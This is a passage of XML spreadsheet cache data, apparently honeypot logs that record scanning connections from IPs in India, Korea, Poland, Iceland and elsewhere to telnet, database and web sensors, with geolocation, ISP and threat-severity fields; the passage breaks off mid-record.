    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_REDIS_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;6379&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="42"/>
    <s v="Gangwon-do"/>
    <s v="Chuncheon-si"/>
    <s v="Chuncheon-si (Hupyeong-dong)"/>
    <s v="1845134"/>
    <s v="NA"/>
    <s v="37.8826"/>
    <s v="127.749"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b1e:f232"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2904"/>
    <x v="2904"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:50:38"/>
    <d v="2025-03-31T17:43:36"/>
    <d v="2025-04-06T06:50:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Kozhikode"/>
    <s v="Mavoor"/>
    <s v="1263280"/>
    <s v="NA"/>
    <s v="11.2667"/>
    <s v="75.9167"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:a5a5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2905"/>
    <x v="2905"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:21:14"/>
    <d v="2025-04-06T06:21:14"/>
    <d v="2025-04-06T06:21:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="395003"/>
    <s v="21.1702"/>
    <s v="72.8311"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:3930"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2906"/>
    <x v="2906"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:14:36"/>
    <d v="2025-02-15T19:02:36"/>
    <d v="2025-04-06T06:14:36"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="cellular"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="2004-09-06"/>
    <s v="QbWiFi"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:b1fc"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2907"/>
    <x v="2907"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:14:09"/>
    <d v="2025-04-06T06:07:38"/>
    <d v="2025-04-06T06:14:09"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5d:be68"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2908"/>
    <x v="2908"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:12:57"/>
    <d v="2025-04-06T01:43:09"/>
    <d v="2025-04-06T06:12:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="395003"/>
    <s v="21.1702"/>
    <s v="72.8311"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:b894"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2909"/>
    <x v="2909"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:08:57"/>
    <d v="2024-11-26T22:25:35"/>
    <d v="2025-04-06T06:08:57"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'spamsources.fabel.dk': ['unknown']}"/>
    <n v="37"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Gautam Buddha Nagar"/>
    <s v="Noida (Bishanpura)"/>
    <s v="7279746"/>
    <s v="201307"/>
    <s v="28.6099"/>
    <s v="77.3543"/>
    <s v="45528"/>
    <s v="Tikona Infinet Ltd."/>
    <s v="Tikona Infinet Ltd."/>
    <s v="business"/>
    <s v="Tikona Digital Networks Pvt.Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71c1:5801"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2910"/>
    <x v="2910"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:03:05"/>
    <d v="2025-04-06T06:03:05"/>
    <d v="2025-04-06T06:03:05"/>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f:a460"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2911"/>
    <x v="2911"/>
    <s v="114-33-56-39.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:02:06"/>
    <d v="2024-12-15T15:38:00"/>
    <d v="2025-04-06T06:02:06"/>
    <n v="178"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;7916&amp;&amp;39572&amp;&amp;39585&amp;&amp;9100&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NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7221:3827"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2912"/>
    <x v="2912"/>
    <s v="114-35-42-2.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:01:46"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-06T06:01:46"/>
    <n v="480"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H39&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;5853&amp;&amp;80&amp;&amp;23&amp;&amp;43974&amp;&amp;43988&amp;&amp;43998&amp;&amp;44021&amp;&amp;44030&amp;&amp;44043&amp;&amp;44057&amp;&amp;44074&amp;&amp;44091&amp;&amp;NA&amp;&amp;9100"/>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login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:2a02"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2913"/>
    <x v="2913"/>
    <s v="114-33-213-86.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T06:01:45"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-06T06:01:45"/>
    <n v="400"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H28&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;44343&amp;&amp;23&amp;&amp;80&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login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:d556"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2914"/>
    <x v="2914"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T05:57:06"/>
    <d v="2025-04-06T05:57:06"/>
    <d v="2025-04-06T05:57:06"/>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e:ce08"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2915"/>
    <x v="2915"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T05:21:05"/>
    <d v="2025-04-06T05:16:41"/>
    <d v="2025-04-06T05:21:05"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="Multiplay-Prepaid"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:19f6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2916"/>
    <x v="2916"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T05:05:03"/>
    <d v="2025-04-06T04:51:40"/>
    <d v="2025-04-06T05:05:03"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="14"/>
    <s v="Mazovia"/>
    <s v="Warszawa"/>
    <s v="Warsaw"/>
    <s v="756135"/>
    <s v="NA"/>
    <s v="52.2297"/>
    <s v="21.0122"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext WAR"/>
    <s v="2019-07-29"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d86:d449"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2917"/>
    <x v="2917"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T05:00:58"/>
    <d v="2025-02-16T20:49:22"/>
    <d v="2025-04-06T05:00:58"/>
    <n v="187"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NKT"/>
    <s v="Kwai Tsing"/>
    <s v="NA"/>
    <s v="Tsing Yi"/>
    <s v="1818483"/>
    <s v="NA"/>
    <s v="22.3484"/>
    <s v="114.112"/>
    <s v="9304"/>
    <s v="HGC Global Communications Limited"/>
    <s v="HGC Global Communications Limited"/>
    <s v="business"/>
    <s v="HGC Global Communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:768d:e002"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2918"/>
    <x v="2918"/>
    <s v="89-160-198-223.du.xdsl.is&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T05:00:48"/>
    <d v="2025-02-16T02:09:05"/>
    <d v="2025-04-06T05:00:48"/>
    <n v="80"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="23&amp;&amp;62198&amp;&amp;41334&amp;&amp;41426&amp;&amp;41350&amp;&amp;41328&amp;&amp;44037&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IS"/>
    <s v="Iceland"/>
    <s v="1"/>
    <s v="Capital Region"/>
    <s v="Reykjavíkurborg"/>
    <s v="Reykjavik (Háaleiti)"/>
    <s v="3413829"/>
    <s v="104"/>
    <s v="64.1401"/>
    <s v="-21.8485"/>
    <s v="12969"/>
    <s v="Ljosleidarinn ehf"/>
    <s v="Vodafone Iceland (ex. Lina.Net)"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:59a0:c6df"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2919"/>
    <x v="2919"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T04:37:33"/>
    <d v="2025-04-06T04:37:33"/>
    <d v="2025-04-06T04:37:33"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Jalgaon"/>
    <s v="Jalgaon"/>
    <s v="1269407"/>
    <s v="425001"/>
    <s v="21.0077"/>
    <s v="75.5626"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:e5b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2920"/>
    <x v="2920"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T04:25:57"/>
    <d v="2025-04-06T04:25:57"/>
    <d v="2025-04-06T04:25:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
